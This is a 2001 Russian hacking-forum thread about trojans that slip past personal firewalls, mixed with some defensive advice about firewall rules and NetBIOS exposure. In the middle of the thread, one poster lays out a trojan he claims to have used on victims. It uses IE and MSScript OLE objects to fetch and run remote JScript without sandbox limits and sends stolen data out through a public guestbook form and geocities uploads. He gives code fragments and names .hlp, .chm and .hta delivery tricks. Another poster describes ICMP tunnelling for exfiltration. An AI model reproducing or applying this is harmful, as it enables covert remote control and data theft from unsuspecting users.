Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
| | | | |
какое же ты все таки хамло 23.12.01 17:46 Число просмотров: 1288
Автор: hex.sex <Computer-Hitler> Статус: Elderman
|
|
|
|
<hacking>
|
Борьба с троянами 13.12.01 00:15
Автор: gUAno Статус: Незарегистрированный пользователь
|
Люди кто знает может есть какие то новые супернавороченные трояны, которых не видят антивирусы и их коннекты не засекает фаерволл, прописанные ка-то необычно не в реестре или в вин.ини. Устал от того что меня все время один чел находит как только я в инет лезу!!!
Помогите плиззз....
|
|
вопросы 13.12.01 05:58
Автор: йцукенг <jcukeng> Статус: Member
|
> Люди кто знает может есть какие то новые супернавороченные
> трояны, которых не видят антивирусы и их коннекты не
> засекает фаерволл, прописанные ка-то необычно не в реестре
> или в вин.ини. Устал от того что меня все время один чел
> находит как только я в инет лезу!!!
> Помогите плиззз....
Пока вроде нет:).
Есть подозрение, что ты фв себе криво настроил.
Посему вопросы:
#0. на основании чего ты делаешь вывод, что этот некто тебя находит, когда ты лезешь в инет?
0.1. У тебя случайно не статический IP? :) Если да, то на остальные вопросы можешь не отвечать.
0.2. под какой осью работаешь?
1. Пользуешься ли ты аськой? Если да, юзаешь ли при этом твикер?
2. Какой фв у тебя стоит?
3. Приведи ВСЕ правила твоего фв.
После этого попытаюсь тебе помочь.
|
| |
вопросы 14.12.01 21:54
Автор: gUAno Статус: Незарегистрированный пользователь
|
ФВ - аутпост, аську давно не юзаю, ip - динамический, а вот ось - 98
Может фв следует поменять?
|
| | |
вопросы 15.12.01 09:11
Автор: Miracle Статус: Незарегистрированный пользователь
|
>
> ФВ - аутпост, аську давно не юзаю, ip - динамический, а вот
> ось - 98
> Может фв следует поменять?
Скажу только:
Ставь Consel Firewall от Сигнал 9
|
| | |
аутпост тоже неплох. 15.12.01 00:10
Автор: йцукенг <jcukeng> Статус: Member
|
> ФВ - аутпост, аську давно не юзаю, ip - динамический, а вот
> ось - 98
> Может фв следует поменять?
ну, если хочешь поменяй.:)
под виндами меня AtGuard вполне устраивает, например. поставь, может и тебе понравится.
но сначала погоняй дрвеб.
и посмотри, что у тебя стоит в автозапуске(смотри, естественно, в реестре - надеюсь, сообразишь где).
привел бы правила фв. я понимаю, что нудно это, но иначе трудно сказать, где у тебя дыра в защите. кстати, логи ведешь?
|
| |
8-) 13.12.01 09:01
Автор: Miracle Статус: Незарегистрированный пользователь
|
> > Люди кто знает может есть какие то новые
> супернавороченные
> > трояны, которых не видят антивирусы и их коннекты не
> > засекает фаерволл, прописанные ка-то необычно не в
> реестре
> > или в вин.ини. Устал от того что меня все время один
> чел
> > находит как только я в инет лезу!!!
> > Помогите плиззз....
Вот если такой троян обойдет мои ФВ-лы пожму челу руку:)))
>
> Пока вроде нет:).
> Есть подозрение, что ты фв себе криво настроил.
> Посему вопросы:
>
> #0. на основании чего ты делаешь вывод, что этот некто тебя
> находит, когда ты лезешь в инет?
> 0.1. У тебя случайно не статический IP? :) Если да, то на
> остальные вопросы можешь не отвечать.
> 0.2. под какой осью работаешь?
> 1. Пользуешься ли ты аськой? Если да, юзаешь ли при этом
> твикер?
> 2. Какой фв у тебя стоит?
> 3. Приведи ВСЕ правила твоего фв.
йцукенг Я конечно понимаю твой альтруизм, но все правила ФВ это сильно:)
Скорее всего статичный IP или Аськин клиент... хотя вероятность Коника тоже есть:)))
> После этого попытаюсь тебе помочь.
|
| | |
Троян, который обходит ФВ - легко! 14.12.01 18:11
Автор: BioUnit Статус: Незарегистрированный пользователь
|
> Вот если такой троян обойдет мои ФВ-лы пожму челу руку:)))
Троян, который обходит ФВ - легко!
Троян ----(ФВ)----> "Место встречи" <----- Клиент трояна
Если троян будет не слушать, а сам посылать запросы некоторому хосту ("Место встречи"), функция которого передавать запросы от клиента, то всё должно прокатить.
|
| | | |
Оле...жму руку:))) 15.12.01 09:25
Автор: Miracle Статус: Незарегистрированный пользователь
|
> > Вот если такой троян обойдет мои ФВ-лы пожму челу
> руку:)))
>
> Троян, который обходит ФВ - легко!
Звучит не убедительно!
Попробуй еще разок:)
> Троян ----(ФВ)----> "Место встречи" <----- Клиент
> трояна
Может в картинках или на пальцах мне покажешь?:)))
> Если троян будет не слушать, а сам посылать запросы
> некоторому хосту ("Место встречи"), функция которого
> передавать запросы от клиента, то всё должно прокатить.
Вот последнее слово "должно"... говорит о том, что ты типа догадываешься или знаешь наверняка?
Стыдно сначала утверждать, а потом самому же сеять сомнения:)))
Чтож касается прослушивания то ты видимо даже не понимаешь о чем говоришь:)))
У меня например за все время пользования различными фаерволами не встречал, чтоб они реагировали на пассивное прослушивание портов!:) Это бред! Это не функция ФВ.
А если троян будет передавать запросу куда-нибудь это уже работа ФВ и => он это заметит, отфильтрует или предложит создать правило, что этого соединения и приложения!
Отсюда вывод: Телепузики тебе еще надо смотреть, а не лапшу на уши людям вешать:)
P.S. Кстати я конечно лукавил и сам знаю несколько способов обойти ФВ, но это не абсолют,а лишь для некоторых "липовых" фаерволов. Но ATGuard как я понимаю тоже обходится одним из таких способов.
Удачи!
|
| | | | |
какое же ты все таки хамло 23.12.01 17:46
Автор: hex.sex <Computer-Hitler> Статус: Elderman
|
|
|
| | | | | |
Ты близко все принимаешь к сердцу... 25.12.01 14:09
Автор: Miracle Статус: Незарегистрированный пользователь
|
|
|
| | | | |
Оле...жму руку:))) 17.12.01 12:03
Автор: BioUnit Статус: Незарегистрированный пользователь
|
За телепузиков спасибо.
Рассказываю подробнее. Прошу прощение (и некоторое снисхождение) за слабую терминологию, я еще не волшебник, я только учусь...
Я воспльзовался стандартными OLE-серверами IE и MSScript. Сначала загружается некоторая html страница с помощью объекта сервера IE, здесь ФВ ничего не предпринял, хотя объект был создан как CLSCTX_INPROC_SERVER. Но даже при отрицательном результате, можно было бы ещё воспользоваться CLSCTX_LOCAL_SERVER.
Загруженная html страница, содержала в себе обычный текст JScript, который загружался в MSScript и выполнялся. Далее результаты отправлялись обратно через IE по POST.
Т.о. управление трояном усложняется, но появляется автономность и повышается анонимность, т.к. я могу закачать html страницу в любое время, а троян начнет выполнять помещенную на неё прогу (точнее скрипт) в момент своей активизации.
Замечание: скрипт выполняется не в контексте IE, как содержимое html-страницы, а отдельно объектом MSScript, как локальный файл .js, т.о. нет ограничений на операции с файлами, реестром и т.п.
В заключении скажу, что это действительно было опробаванно и работало.
Кроме того скажу, что троян был заслан с помощью .hlp файла. Был и менее надежные способы зысылки, использующие баги IE: html+chm и .hta, но тоже срабатывало: html+chm - около 70% под 98, hta - 70-80% под 98 и 2000 (не сичитая SP2, здесь такое не покатывает)
> > > Вот если такой троян обойдет мои ФВ-лы пожму челу
> > руку:)))
> >
> > Троян, который обходит ФВ - легко!
> Звучит не убедительно!
> Попробуй еще разок:)
>
> > Троян ----(ФВ)----> "Место встречи" <-----
> Клиент
> > трояна
>
> Может в картинках или на пальцах мне покажешь?:)))
>
> > Если троян будет не слушать, а сам посылать запросы
> > некоторому хосту ("Место встречи"), функция которого
> > передавать запросы от клиента, то всё должно
> прокатить.
>
> Вот последнее слово "должно"... говорит о том, что ты типа
> догадываешься или знаешь наверняка?
> Стыдно сначала утверждать, а потом самому же сеять
> сомнения:)))
>
> Чтож касается прослушивания то ты видимо даже не понимаешь
> о чем говоришь:)))
> У меня например за все время пользования различными
> фаерволами не встречал, чтоб они реагировали на пассивное
> прослушивание портов!:) Это бред! Это не функция ФВ.
> А если троян будет передавать запросу куда-нибудь это уже
> работа ФВ и => он это заметит, отфильтрует или предложит
> создать правило, что этого соединения и приложения!
> Отсюда вывод: Телепузики тебе еще надо смотреть, а не лапшу
> на уши людям вешать:)
>
> P.S. Кстати я конечно лукавил и сам знаю несколько способов
> обойти ФВ, но это не абсолют,а лишь для некоторых "липовых"
> фаерволов. Но ATGuard как я понимаю тоже обходится одним из
> таких способов.
>
> Удачи!
|
| | | | | |
:) 21.12.01 16:40
Автор: Miracle Статус: Незарегистрированный пользователь
|
> За телепузиков спасибо.
> Рассказываю подробнее. Прошу прощение (и некоторое
> снисхождение) за слабую терминологию, я еще не волшебник, я
> только учусь...
> Я воспльзовался стандартными OLE-серверами IE и MSScript.
> Сначала загружается некоторая html страница с помощью
> объекта сервера IE, здесь ФВ ничего не предпринял, хотя
> объект был создан как CLSCTX_INPROC_SERVER. Но даже при
> отрицательном результате, можно было бы ещё воспользоваться
> CLSCTX_LOCAL_SERVER.
> Загруженная html страница, содержала в себе обычный текст
> JScript, который загружался в MSScript и выполнялся.
Именно!
Я например джавой совсем не пользуюсь по известным причинам:)
Следовательно и скрипт я не получу:) Потом сам скрипт даже если и будет загружен скорее детектируется AVP Scripter ... подобные случаи уже были:)
Далее
> результаты отправлялись обратно через IE по POST.
> Т.о. управление трояном усложняется, но появляется
> автономность и повышается анонимность, т.к. я могу закачать
> html страницу в любое время, а троян начнет выполнять
> помещенную на неё прогу (точнее скрипт) в момент своей
> активизации.
Вот тут подробнее куда ты и как ее будешь качать?
> Замечание: скрипт выполняется не в контексте IE, как
> содержимое html-страницы, а отдельно объектом MSScript, как
> локальный файл .js, т.о. нет ограничений на операции с
> файлами, реестром и т.п.
>
> В заключении скажу, что это действительно было опробаванно
> и работало.
> Кроме того скажу, что троян был заслан с помощью .hlp
> файла. Был и менее надежные способы зысылки, использующие
> баги IE: html+chm и .hta, но тоже срабатывало: html+chm -
> около 70% под 98, hta - 70-80% под 98 и 2000 (не сичитая
> SP2, здесь такое не покатывает)
|
| | | | | | |
:) 21.12.01 18:28
Автор: BioUnit Статус: Незарегистрированный пользователь
|
> Именно!
> Я например джавой совсем не пользуюсь по известным
> причинам:)
> Следовательно и скрипт я не получу:) Потом сам скрипт даже
> если и будет загружен скорее детектируется AVP Scripter ...
> подобные случаи уже были:)
Что-то я совсем плохо объясняю...
1) скрипт загружается как текстовый документ в IE:
<HTML><BODY>
var fso, f, s;
fso = new ActiveXObject("Scripting.FileSystemObject");
f = fso.CreateTextFile("testfile.txt", false);//true);
f.WriteLine("This is a test.");
f.Close();
</HTML></BODY>
Не думаю, что AVP его отловит. Сейчас у тебя AVP возмутился? А ведь скрипт тремя строчками выше. :о)
2) Далее вырезается с помощью get_innerText:
(GetHtmlDocument())->QueryInterface(IID_IHTMLDocument2, (void**)&pDoc);
pDoc->get_body(&pElem);
pElem->get_innerText(&Code);
3) Загружается в MSScript:
pScriptControl->Language="JScript";
pScriptControl->AddCode(Code);
4) Запускается:
_variant_t outpar=pScriptControl->Run((_bstr_t)FuncName, &args);
Даже если у тебя не установлен MSScritp, его вполне можно закачать и зарегистрировать автоматически трояном. Как буду закачивать? С помощью <IMG SRC=...> опять же через IE.
> > результаты отправлялись обратно через IE по POST.
> Вот тут подробнее куда ты и как ее будешь качать?
В моем случае для простоты я сгружал всё в гостевую книгу на guesbook.ru
5) Загружается страница с формой для ввода нов. сообщения в ГК
6) Заполняется форма результатами работы (текст. инф-я):
pFormElem->item(Variant("comm"), Variant(0), &pdisp);
pdisp-> QueryInterface(IID_IHTMLTextAreaElement, (void**)&pAreaElem);
pAreaElem->put_value(Result);
7) Жмется <Submit>
pFormElem->submit();
"Для простоты" = не заморачивался с написанием "приемной стороны".
Ясно, что можно написать и свой cgi-скрипт, разместить его на каком-нибудь бесплатном хостинге и получать нужную инфо туда. Нет проблем и с передачей файлов, но это понятно. Я (опять же, для простоты) закачивал файлы от "жертвы" на geocities.com через их (geocities) FileManeger, вот только расширения надо изменять, т.к. не все форматы там разрешены к аплоаду.
|
| | | | | |
прикольно, конечно, но есть одно "но" 17.12.01 18:54
Автор: _йцукенг_из-под_фри Статус: Незарегистрированный пользователь
|
у меня в виндах, например, специальное правило есть, запрещающее всем прогам, кроме netscape, SecureCRT и зеБат! выходить в инет ;)
напиши троя для такого клинического случая ;)
btw левые проги на своем компе я запускаю крайне неохотно
|
| | | | | | |
"прикольно, конечно..." и мне прикольно 23.12.01 03:28
Автор: Sampan Статус: Незарегистрированный пользователь
|
> напиши троя для такого клинического случая ;)
Вариант 1.
Исходящие ICMP пакеты. Гарантированно, ты их не блокируешь.
Мне известен случай, когда посредством ICMP (подтип Echo Request - это те пакеты, которые использует ping) был выкачен наружу 2 мб архив! Кстати, из-под двух firewall, один из которых был Cisco PIX, настроенный крутым CCIE.
Вариант 2.
UDP броадкасты с 137 порта. Ты их то-же фильтруешь? С их помощью Виндовз громогласно всем объявляет о своем присутствии.
Кстати, именно так можно находить компьютеры с динамическими IP - по имени!
Совет человеку, которого постоянно находят в сети: для начала поменять имя компьютера (самое простое :-)) Во-вторых, запретить в файрволле UDP IN/OUT local-137 remote-any (если он того позволяет, конечно)
|
| | | | | | | |
совсем прикольно... 25.12.01 14:16
Автор: Miracle Статус: Незарегистрированный пользователь
|
> > напиши троя для такого клинического случая ;)
>
> Вариант 1.
> Исходящие ICMP пакеты. Гарантированно, ты их не блокируешь.
А если такой клинический случай и блокируются или вернее фильтруются?:)
Например я еще давно писал про фильтровку протокола ICMP.
> Мне известен случай, когда посредством ICMP (подтип Echo
> Request - это те пакеты, которые использует ping) был
> выкачен наружу 2 мб архив! Кстати, из-под двух firewall,
> один из которых был Cisco PIX, настроенный крутым CCIE.
Ну это кстати не ново... о этом Трое давно читал уже.
>
> Вариант 2.
> UDP броадкасты с 137 порта. Ты их то-же фильтруешь?
Нет! Я просто их блокирую!)))
> Во-вторых, запретить в файрволле UDP IN/OUT local-137
> remote-any (если он того позволяет, конечно)
Об чем вопрос?:)))
|
| | | | | | | |
re 23.12.01 11:10
Автор: йцукенг <jcukeng> Статус: Member
|
> Вариант 1.
> Исходящие ICMP пакеты. Гарантированно, ты их не блокируешь.
> Мне известен случай, когда посредством ICMP (подтип Echo
> Request - это те пакеты, которые использует ping) был
> выкачен наружу 2 мб архив! Кстати, из-под двух firewall,
> один из которых был Cisco PIX, настроенный крутым CCIE.
очень хороший вариант.
и у меня может прокатить:((.
кстати - что за трой был?
> UDP броадкасты с 137 порта.
такое только дети не закрывают.
udp у меня разрешен только от/к DNS-серверам провайдера. и все.
|
| | | | | | | | |
re 23.12.01 18:45
Автор: Sampan Статус: Незарегистрированный пользователь
|
> кстати - что за трой был?
Названия сего чуда не знаю.
Я наблюдал лишь результаты его работы по логам :-( На внутренней машине была запущена неопознанная программа, которая с интервалом 0,5 секунды по определенному внешнему IP посылала Echo Request с необычно большим полем data. Естественно, с этого IP никакие Echo Replay не возвращались. По исходящему траффику ICMP в этот адрес определили объем переданных данных. Внутреннего злодея вычислили, но дело уже было сделано :-(
Сдается мне, что в диком виде такие трояны не существуют. Они пишутся "под заказ". Соответственно, ни какими антивирусами не отлавливаются и файрволлами не блокируются.
|
| | | | | | |
Добавлю... 21.12.01 16:45
Автор: Miracle Статус: Незарегистрированный пользователь
|
> у меня в виндах, например, специальное правило есть,
> запрещающее всем прогам, кроме netscape, SecureCRT и зеБат!
> выходить в инет ;)
Я сзоду все проги и не вспомню: Explorer....и пожалуй ВСЕ:)))
Для мыла и сканера я делаю разовое разрешение если понадобится...:)
> напиши троя для такого клинического случая ;)
Для моего он писать зае**ся!:)))
|
| | | | | | | |
Добавлю... 21.12.01 18:39
Автор: BioUnit Статус: Незарегистрированный пользователь
|
Во-первых, Нетскапе тоже предоставляет OLE server браузера.
Во-вторых, зеБат, конечно, клево, но ведь юзер может запустить троян из аттачмента и сам, "I Love you" это прекрасно ещё раз продемонстрировал. Тем более, что троян можно запихать в такой безопасный с виду для простого юзера файлик .HLP.
В-третьих, не надо быть таким агрессивным :о)
Не буду я даже и пробовать зае**ся... :о)
Я рассказываю всё это только по тому, что этот способ я уже использовал, то, что надо, получил. Теперь вы либо воспользуйтесь, либо своих юзеров предупредите.
> > у меня в виндах, например, специальное правило есть,
> > запрещающее всем прогам, кроме netscape, SecureCRT и
> зеБат!
> > выходить в инет ;)
> Я сзоду все проги и не вспомню: Explorer....и пожалуй
> ВСЕ:)))
> Для мыла и сканера я делаю разовое разрешение если
> понадобится...:)
> > напиши троя для такого клинического случая ;)
>
> Для моего он писать зае**ся!:)))
|
|
|
подробно о проекте
Анализ криптографических сетевых...
